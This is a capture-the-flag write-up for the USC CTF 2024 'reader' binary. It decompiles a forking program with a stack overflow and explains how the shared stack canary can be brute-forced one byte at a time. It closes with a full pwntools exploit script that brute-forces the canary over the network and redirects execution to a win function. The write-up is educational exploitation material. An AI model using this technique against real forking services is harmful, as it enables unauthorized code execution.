Forking Buffer Overflow

This is a binary exploitation challenge from the USC CTF 2024. It involves an arbitrary stack overflow that allows for control flow hijacking.

Reader

Running the normal checks, we can see that we’re working with a x86-64 ELF. The protections on the binary are partial relro, a canary, non-executable stack, and no pie. Let’s decompile the binary and see what we can find.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void main(void)

{
  int iVar1;
  
  while( true ) {
    iVar1 = fork();
    if (iVar1 < 0) {
      perror("fork failed");
      exit(1);
    }
    if (iVar1 == 0) break;
    wait((void *)0x0);
  }
  vuln();
  exit(0);
}

Pulling out the main function here from Ghidra, we can see some interesting functionality here. The program is forking before continuing. This kind of simulates interaction with some like a web server, where on connecting you are spawned into your own little world while the web server still persists even when nobody is connected. This is interesting behavior for a binary because it allows for certain exploitation like we’ll see later. Let’s check out the vuln function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void vuln(void)

{
  long in_FS_OFFSET;
  undefined local_58 [72];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Enter some data: ");
  fflush(stdout);
  read(0,local_58,0x80);
  puts("Your data was read. Did you get the flag?");
  fflush(stdout);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}

So pretty obvious stack overflow in this function. We have a 72 byte buffer in which we are reading 0x80 bytes into. Given that there is no pie and theres actually a ‘win’ function inside of this binary, we can hijack control flow and return to win. The only problem here is the stack canary protection. But as discussed before, using a forking process for this introduces some attack surface. Inside of a binary, the stack canary is generated and doesn’t change while the binary lives. It is also inherited between all the functions that use a canary inside of the binary. So everytime we fork and get into this function, we will always have the same canary.

Exploiting this becomes trivial as we have a persisting connection and can brute force the stack canary. Now from general knowledge, I know that the trailing byte of a canary is always ‘\x00’, so realistically we only need to brute force the 7 other bytes of the canary. This is feasible in this scenario as we can go byte by byte by triggering the stack smashing response from the binary when we guess the incorrect byte.

The actual bruteforce calculation comes down to 1792 (7 bytes of canary * 256 possible values for a single byte) maximum iterations. While in reality we probably wont get too close to this number as the bytes aren’t always going to be 256 or close to it. Either way this number is very feasible.

Solve Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *

bin = './reader'

elf = context.binary = ELF(bin)
offset = 9*8  # offset from beginning of buffer to canary
canary = b'\x00' # first byte of canary in little endian

p = remote('0.cloud.chals.io', 10677)
for i in range(7): # seven bytes for rest of canary
    for j in range(256): # 256 for every possible value of a single byte
        payload = b'A'*offset + canary + bytes([j]) # fill buffer till canary then try next value
        p.send(payload)
        print(p.recvline())
        ret = p.recvuntil(b':')
        if b'stack' in ret: # if stack smashing in response, we got the wrong byte
            p.recvline()
        else: # stack smashing was not in the response, so we got the correct byte
            canary += bytes([j])
            print(canary)
            break

payload = b'A'*offset + canary + p64(0) +  p64(elf.sym['win']) # returning to win, filling the 8 byte gap between canary and return address
p.sendline(payload)
p.interactive()

One last important thing you should note about this script is that I am utilizing p.send() instead of any form of p.sendline(). This is extremely important because using p.sendline() appends the \n byte to your payload, which will always (well almost always) return false for the canary, even if you guessed the correct byte before the \n was appended.